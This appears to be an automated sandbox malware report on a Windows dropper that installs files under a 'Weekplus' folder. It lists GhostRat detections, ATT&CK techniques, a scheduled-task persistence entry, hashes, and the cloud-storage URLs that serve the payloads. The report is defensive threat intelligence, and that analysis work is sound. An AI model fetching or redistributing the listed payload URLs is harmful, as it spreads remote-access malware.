Source: C:\Program Files\Weekplus\APP.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.dll VolumeInformation	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.dll VolumeInformation	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Xml\v4.0_4.0.0.0__b77a5c561934e089\System.XML.dll VolumeInformation	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe

Code function: 0_2_00007FF8B9141E20 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_00007FF8B9141E20

Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: Amcache.hve.7.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.7.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.7.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.7.dr	Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Yara detected GhostRat

Source: Yara match	File source: 00000016.00000002.3916971984.000002C1511F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2915361128.000001B59B050000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.3327082496.00000115DC1B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: GamePlusPlus.exe PID: 5752, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: GamePlusPlus.exe PID: 6308, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: GamePlusPlus.exe PID: 7072, type: MEMORYSTR

Remote Access Functionality

Yara detected GhostRat

Source: Yara match	File source: 00000016.00000002.3916971984.000002C1511F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2915361128.000001B59B050000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.3327082496.00000115DC1B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: GamePlusPlus.exe PID: 5752, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: GamePlusPlus.exe PID: 6308, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: GamePlusPlus.exe PID: 7072, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	1 Replication Through Removable Media	1 Native API	1 DLL Side-Loading	12 Process Injection	3 Masquerading	31 Input Capture	1 System Time Discovery	Remote Services	31 Input Capture	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 Abuse Elevation Control Mechanism	1 Disable or Modify Tools	LSASS Memory	1 Query Registry	Remote Desktop Protocol	1 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	51 Virtualization/Sandbox Evasion	Security Account Manager	61 Security Software Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	12 Process Injection	NTDS	2 Process Discovery	Distributed Component Object Model	Input Capture	3 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	51 Virtualization/Sandbox Evasion	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Abuse Elevation Control Mechanism	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	2 Obfuscated Files or Information	DCSync	21 Peripheral Device Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	3 File and Directory Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	HTML Smuggling	/etc/passwd and /etc/shadow	36 System Information Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
#U6c47#U8054#U652f#U4ed8.exe	29%	Virustotal		Browse
#U6c47#U8054#U652f#U4ed8.exe	16%	ReversingLabs	ByteCode-MSIL.Trojan.Generic
#U6c47#U8054#U652f#U4ed8.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner
C:\Program Files\Weekplus\APP.exe	100%	Joe Sandbox ML
C:\Program Files\Weekplus\GamePlusPlus.exe	0%	ReversingLabs
C:\Program Files\Weekplus\steam_api64.dll	0%	ReversingLabs

Source	Detection	Scanner	Label
https://wwwchongqingget-1328031368.cos.ap-chongqing.myqcloud.com/openvr_api.dll	0%	Avira URL Cloud	safe
http://pesterbdd.com/images/Pester.pngxktI	0%	Avira URL Cloud	safe
https://wwwwgetmore-1328031368.cos.ap-chongqing.myqcloud.com/steam_api64.dll	0%	Avira URL Cloud	safe
https://wwwchongqingget-1328031368.cos.ap-chongqing.myqcloud.com/APP.exe	0%	Avira URL Cloud	safe
https://www19daxcsdaf-1328031368.cos.ap-guangzhou.myqcloud.com	0%	Avira URL Cloud	safe
https://www19daxcsdaf-1328031368.cos.ap-guangzhou.myqcloud.com/mpclient.dat	0%	Avira URL Cloud	safe
https://wwwchongqingget-1328031368.cos.ap-chongqing.myqcloud.com/GamePlusPlus.exe	0%	Avira URL Cloud	safe
https://wwwchongqingget-1328031368.cos.ap-chongqing.myqcloud.com	0%	Avira URL Cloud	safe
https://wwwchongqingget-1328031368.cos.ap-chongqing.myqcloud.com/mpclient64.dat	0%	Avira URL Cloud	safe
http://crl.m~	0%	Avira URL Cloud	safe
https://wwwwgetmore-1328031368.cos.ap-chongqing.myqcloud.com	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
cq.file.myqcloud.com	183.66.100.51	true	false	unknown
gz.file.myqcloud.com	159.75.57.35	true	false	high
wwwchongqingget-1328031368.cos.ap-chongqing.myqcloud.com	unknown	unknown	true	unknown
www19daxcsdaf-1328031368.cos.ap-guangzhou.myqcloud.com	unknown	unknown	true	unknown
wwwwgetmore-1328031368.cos.ap-chongqing.myqcloud.com	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://wwwchongqingget-1328031368.cos.ap-chongqing.myqcloud.com/openvr_api.dll	false	Avira URL Cloud: safe	unknown
https://wwwchongqingget-1328031368.cos.ap-chongqing.myqcloud.com/APP.exe	false	Avira URL Cloud: safe	unknown
https://www19daxcsdaf-1328031368.cos.ap-guangzhou.myqcloud.com/mpclient.dat	false	Avira URL Cloud: safe	unknown
https://wwwchongqingget-1328031368.cos.ap-chongqing.myqcloud.com/GamePlusPlus.exe	false	Avira URL Cloud: safe	unknown
https://wwwchongqingget-1328031368.cos.ap-chongqing.myqcloud.com/mpclient64.dat	false	Avira URL Cloud: safe	unknown
https://wwwwgetmore-1328031368.cos.ap-chongqing.myqcloud.com/steam_api64.dll	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://nuget.org/NuGet.exe	#U6c47#U8054#U652f#U4ed8.exe, 00000000.00000002.3992968256.0000000015466000.00000004.00000800.00020000.00000000.sdmp, APP.exe, 00000003.00000002.2424632133.0000000013D8C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://aka.ms/winsvr-2022-pshelp	#U6c47#U8054#U652f#U4ed8.exe, 00000000.00000002.3969584982.00000000056D4000.00000004.00000800.00020000.00000000.sdmp	false		high
http://pesterbdd.com/images/Pester.pngxktI	#U6c47#U8054#U652f#U4ed8.exe, 00000000.00000002.3969584982.00000000056D4000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://github.com/Pester/PesterxktI	#U6c47#U8054#U652f#U4ed8.exe, 00000000.00000002.3969584982.00000000056D4000.00000004.00000800.00020000.00000000.sdmp	false		high
http://pesterbdd.com/images/Pester.png	APP.exe, 00000003.00000002.2398792694.0000000003F43000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0.htmlxktI	#U6c47#U8054#U652f#U4ed8.exe, 00000000.00000002.3969584982.00000000056D4000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/soap/encoding/	#U6c47#U8054#U652f#U4ed8.exe, 00000000.00000002.3969584982.00000000056D4000.00000004.00000800.00020000.00000000.sdmp, APP.exe, 00000003.00000002.2398792694.0000000003F43000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0.html	APP.exe, 00000003.00000002.2398792694.0000000003F43000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.microsoft.co	#U6c47#U8054#U652f#U4ed8.exe, 00000000.00000002.4043145329.000000001E180000.00000004.00000020.00020000.00000000.sdmp	false		high
https://contoso.com/License	APP.exe, 00000003.00000002.2424632133.0000000013D8C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/Icon	APP.exe, 00000003.00000002.2424632133.0000000013D8C000.00000004.00000800.00020000.00000000.sdmp	false		high
http://upx.sf.net	Amcache.hve.7.dr	false		high
https://www19daxcsdaf-1328031368.cos.ap-guangzhou.myqcloud.com	#U6c47#U8054#U652f#U4ed8.exe, 00000000.00000002.3969584982.0000000005429000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://github.com/Pester/Pester	APP.exe, 00000003.00000002.2398792694.0000000003F43000.00000004.00000800.00020000.00000000.sdmp	false		high
https://wwwchongqingget-1328031368.cos.ap-chongqing.myqcloud.com	#U6c47#U8054#U652f#U4ed8.exe, 00000000.00000002.3969584982.00000000053D1000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/wsdl/	#U6c47#U8054#U652f#U4ed8.exe, 00000000.00000002.3969584982.00000000056D4000.00000004.00000800.00020000.00000000.sdmp, APP.exe, 00000003.00000002.2398792694.0000000003F43000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/	APP.exe, 00000003.00000002.2424632133.0000000013D8C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://nuget.org/nuget.exe	#U6c47#U8054#U652f#U4ed8.exe, 00000000.00000002.3992968256.0000000015466000.00000004.00000800.00020000.00000000.sdmp, APP.exe, 00000003.00000002.2424632133.0000000013D8C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://aka.ms/winsvr-2022-pshelpxktI	#U6c47#U8054#U652f#U4ed8.exe, 00000000.00000002.3969584982.00000000056D4000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.m~	#U6c47#U8054#U652f#U4ed8.exe, 00000000.00000002.4040565455.000000001DEF5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	#U6c47#U8054#U652f#U4ed8.exe, 00000000.00000002.3969584982.00000000053D1000.00000004.00000800.00020000.00000000.sdmp, APP.exe, 00000003.00000002.2398792694.0000000003D11000.00000004.00000800.00020000.00000000.sdmp	false		high
https://wwwwgetmore-1328031368.cos.ap-chongqing.myqcloud.com	#U6c47#U8054#U652f#U4ed8.exe, 00000000.00000002.3969584982.0000000005491000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.micros	APP.exe, 00000003.00000002.2432695215.000000001D100000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
183.66.100.45	unknown	China	134420	CHINATELECOM-CHONGQING-IDCChongqingTelecomCN	false
149.115.250.19	unknown	United States	174	COGENT-174US	false
159.75.57.35	gz.file.myqcloud.com	China	1257	TELE2EU	false
183.66.100.51	cq.file.myqcloud.com	China	134420	CHINATELECOM-CHONGQING-IDCChongqingTelecomCN	false

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1592740
Start date and time:	2025-01-16 13:43:06 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 10m 31s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name:	Run with higher sleep bypass
Number of analysed new started processes analysed:	28
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	#U6c47#U8054#U652f#U4ed8.exe renamed because original name is a hash value
Original Sample Name:	.exe
Detection:	MAL
Classification:	mal92.troj.evad.winEXE@29/33@3/4
EGA Information:	Successful, ratio: 80%
HCA Information:	Successful, ratio: 99% Number of executed functions: 100 Number of non-executed functions: 206
Cookbook Comments:	Found application associated with file extension: .exe Sleeps bigger than 100000000ms are automatically reduced to 1000ms Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 52.168.117.173, 20.189.173.21, 20.42.73.29, 13.107.246.45, 4.245.163.56, 40.126.32.134
Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, onedsblobprdwus16.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target APP.exe, PID 5400 because it is empty
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Report size getting too big, too many NtSetInformationFile calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
13:44:36	Task Scheduler	Run new task: GamePlusPlus path: C:\Program Files\Weekplus\GamePlusPlus.exe s>1

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
183.66.100.45	CB8tXUIILN.exe	Get hash	malicious	Unknown	Browse
	PDF.exe	Get hash	malicious	Unknown	Browse
	PDF.exe	Get hash	malicious	Unknown	Browse
159.75.57.35	#U67e5_-uninstall.exe	Get hash	malicious	Unknown	Browse
	LisectAVT_2403002B_78.exe	Get hash	malicious	Unknown	Browse
	2IVWAPeiZm.exe	Get hash	malicious	GhostRat	Browse
	#U75c5#U6bd2#U67e5#U6740#U5de5#U5177.exe	Get hash	malicious	Unknown	Browse
183.66.100.51	cZ3Ju8l4ia.dll	Get hash	malicious	CobaltStrike	Browse
	cZ3Ju8l4ia.dll	Get hash	malicious	CobaltStrike	Browse
	CB8tXUIILN.exe	Get hash	malicious	Unknown	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
gz.file.myqcloud.com	#U67e5_-uninstall.exe	Get hash	malicious	Unknown	Browse	159.75.57.35
	WhaleInstall.exe	Get hash	malicious	Unknown	Browse	159.75.57.69
	uMGZmwaXI2.exe	Get hash	malicious	BlackMoon	Browse	159.75.57.69
	LisectAVT_2403002B_246.exe	Get hash	malicious	Unknown	Browse	159.75.57.69
	LisectAVT_2403002B_246.exe	Get hash	malicious	Unknown	Browse	159.75.57.36
	LisectAVT_2403002B_78.exe	Get hash	malicious	Unknown	Browse	159.75.57.35
	LisectAVT_2403002B_78.exe	Get hash	malicious	Unknown	Browse	159.75.57.36
	2IVWAPeiZm.exe	Get hash	malicious	GhostRat	Browse	159.75.57.35
	#U75c5#U6bd2#U67e5#U6740#U5de5#U5177.exe	Get hash	malicious	Unknown	Browse	159.75.57.36
cq.file.myqcloud.com	cZ3Ju8l4ia.dll	Get hash	malicious	CobaltStrike	Browse	183.66.100.51
	cZ3Ju8l4ia.dll	Get hash	malicious	CobaltStrike	Browse	183.66.100.51
	CB8tXUIILN.exe	Get hash	malicious	Unknown	Browse	183.66.100.45
	CB8tXUIILN.exe	Get hash	malicious	Unknown	Browse	183.66.100.51
	PDF.exe	Get hash	malicious	Unknown	Browse	183.66.100.45
	PDF.exe	Get hash	malicious	Unknown	Browse	183.66.100.45
	https://docusign23022023mic-1312962597.cos.ap-chongqing.myqcloud.com/docu.htm#craig.barber@abrholdings.com	Get hash	malicious	Unknown	Browse	114.117.223.33

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CHINATELECOM-CHONGQING-IDCChongqingTelecomCN	5.elf	Get hash	malicious	Unknown	Browse	119.87.203.228
	4.elf	Get hash	malicious	Unknown	Browse	113.250.192.151
	6.elf	Get hash	malicious	Unknown	Browse	119.86.160.80
	sora.ppc.elf	Get hash	malicious	Unknown	Browse	113.250.232.207
	botnet.spc.elf	Get hash	malicious	Mirai, Moobot	Browse	119.87.53.244
	spc.elf	Get hash	malicious	Mirai	Browse	119.87.203.243
	Josho.x86.elf	Get hash	malicious	Unknown	Browse	113.250.192.176
	loligang.ppc.elf	Get hash	malicious	Mirai	Browse	119.86.159.84
	x86_64.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	183.66.98.199
CHINATELECOM-CHONGQING-IDCChongqingTelecomCN	5.elf	Get hash	malicious	Unknown	Browse	119.87.203.228
	4.elf	Get hash	malicious	Unknown	Browse	113.250.192.151
	6.elf	Get hash	malicious	Unknown	Browse	119.86.160.80
	sora.ppc.elf	Get hash	malicious	Unknown	Browse	113.250.232.207
	botnet.spc.elf	Get hash	malicious	Mirai, Moobot	Browse	119.87.53.244
	spc.elf	Get hash	malicious	Mirai	Browse	119.87.203.243
	Josho.x86.elf	Get hash	malicious	Unknown	Browse	113.250.192.176
	loligang.ppc.elf	Get hash	malicious	Mirai	Browse	119.86.159.84
	x86_64.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	183.66.98.199
TELE2EU	sora.mpsl.elf	Get hash	malicious	Mirai	Browse	159.72.74.6
	i686.elf	Get hash	malicious	Mirai	Browse	145.235.165.77
	xd.sh4.elf	Get hash	malicious	Mirai	Browse	83.181.157.161
	178.215.238.129-x86-2025-01-15T04_59_51.elf	Get hash	malicious	Mirai	Browse	159.75.64.242
	x86.elf	Get hash	malicious	Unknown	Browse	213.102.17.215
	x86_64.elf	Get hash	malicious	Unknown	Browse	145.235.229.203
	meth6.elf	Get hash	malicious	Mirai	Browse	159.75.64.46
	5.elf	Get hash	malicious	Unknown	Browse	213.103.0.253
	res.sh4.elf	Get hash	malicious	Unknown	Browse	83.185.2.149
COGENT-174US	la.bot.x86_64.elf	Get hash	malicious	Mirai	Browse	38.60.221.89
	mpsl.elf	Get hash	malicious	Unknown	Browse	209.39.21.238
	3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Get hash	malicious	FormBook	Browse	149.104.185.93
	87.121.112.22-arm-2025-01-16T06_52_38.elf	Get hash	malicious	Unknown	Browse	149.11.92.108
	87.121.112.22-mips-2025-01-16T06_52_39.elf	Get hash	malicious	Unknown	Browse	38.198.201.28
	Personliche Nachricht fur Friedhelm Hanusch.pdf	Get hash	malicious	Unknown	Browse	143.244.208.184
	i586.elf	Get hash	malicious	Unknown	Browse	38.32.85.52
	sora.mpsl.elf	Get hash	malicious	Mirai	Browse	140.242.24.248
	sora.mips.elf	Get hash	malicious	Mirai	Browse	38.185.133.98

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe	Get hash	malicious	Snake Keylogger	Browse	159.75.57.35 183.66.100.45 183.66.100.51
	U23BGA2025REQ.exe	Get hash	malicious	MassLogger RAT	Browse	159.75.57.35 183.66.100.45 183.66.100.51
	Notice_bill_of_lading_number_HAWB_771434342326.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	159.75.57.35 183.66.100.45 183.66.100.51
	Faktura VAT-FV2025011500091._pdf .scr.exe	Get hash	malicious	Snake Keylogger	Browse	159.75.57.35 183.66.100.45 183.66.100.51
	MACHINE SPECIFICATION.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	159.75.57.35 183.66.100.45 183.66.100.51
	54403 ADVANCED DEMURRAGE PROFORMA 15.01.2025.scr.exe	Get hash	malicious	MassLogger RAT	Browse	159.75.57.35 183.66.100.45 183.66.100.51
	ORDER-202577008.lnk	Get hash	malicious	Unknown	Browse	159.75.57.35 183.66.100.45 183.66.100.51
	INQUIRY LIST 292.vbs	Get hash	malicious	DBatLoader, MassLogger RAT, PureLog Stealer	Browse	159.75.57.35 183.66.100.45 183.66.100.51
	Contrarre.scr.exe	Get hash	malicious	MassLogger RAT	Browse	159.75.57.35 183.66.100.45 183.66.100.51

Process:	C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe
File Type:	PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	5632
Entropy (8bit):	5.239611965241187
Encrypted:	false
SSDEEP:	96:eGD4Dp824dwjFYi5YTycK8D5fyQ92XD9TKv7VZJzNt:JMtJYiYTJ/D5TW9oPr
MD5:	53F534B5BE5BD54C0BBD6168C510776E
SHA1:	C128895D5F59CFAE7A3E6FDB7AC2BC8B72520E39
SHA-256:	0BFDF16376D828D4BA62419D58EE651C0FD7FEFBB6B2BF6D0D1114C06ED7B85E
SHA-512:	602F658C55477D534E9B244D4947108D2218113CC1006EFF1380F945330A7E14B05BEB38A5C038B76DC9A9EC601B97D12CAC39970EA83B54D46B1F9C57791584
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.....g.........."...................... .....@..... .......................`............@...@......@............... ...............................@..............................D+............................................................... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..BH.......0!......................................................................F(.....(....o.......0..........(......o.....o......o.....o.....o....r...po.....o......o....s......o......+...o.........o....o ...&..o!...-.....,...o".....o.............J.$n.......0..........r...p..(......(....&..(#......BSJB............v4.0.30319......l.......#~..\...h...#Strings............#US.h.......#GUID...x.......#Blob...........G.........%3........................#...............................

C:\Program Files\Weekplus\GamePlusPlus.exe

Download File

Process:	C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	251488
Entropy (8bit):	6.595967056502266
Encrypted:	false
SSDEEP:	6144:oQQ45u4vQmuAFiTdx9VieWhIBpyHUN7wkb5:hDQt73x/6Y7pl
MD5:	8038EBB15EC202AD0A25564E55CDF32D
SHA1:	588AB42D8C7F1515BC1100868C62C1A291922906
SHA-256:	294D514FC9483D8DAE8EBFC071F2AC2935936A3EF5422071F44AFFE55E4EE97A
SHA-512:	DBC09AC53C439DEB84411D58F91D718257F881AEABBAC6E0526A23E95B8C9FBE345D50127D9CD1FC0E0EE589059FAEAFF7F068E0598CDCB4B0DF8CC8B31012A3
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@.......................................VLV.........dtWg.4....3Hlq].s8.N....uj..g..3u..J.u.^o..A.ht..+.}.4...F..C.....}:.~.~`...]T.jV..V.u.c..e.(_f..U..6.^./B}i...\:.u......O.@b...........................................................................PE..d...@tWg.........."............................@.............................0......y.....`..........................................................`.......@..H.......`,... ..p....f..T....................g..(....f............... ..(............................text............................... ..`.rdata....... ......................@..@.data...p_..........................@....pdata..H....@... ..................@..@.rsrc........`......................@..@.reloc..p.... ......................@..B........................................................................................................................................................................................................................

C:\Program Files\Weekplus\mpclient.dat

Download File

Process:	C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe
File Type:	data
Category:	dropped
Size (bytes):	334805
Entropy (8bit):	7.979290617781527
Encrypted:	false
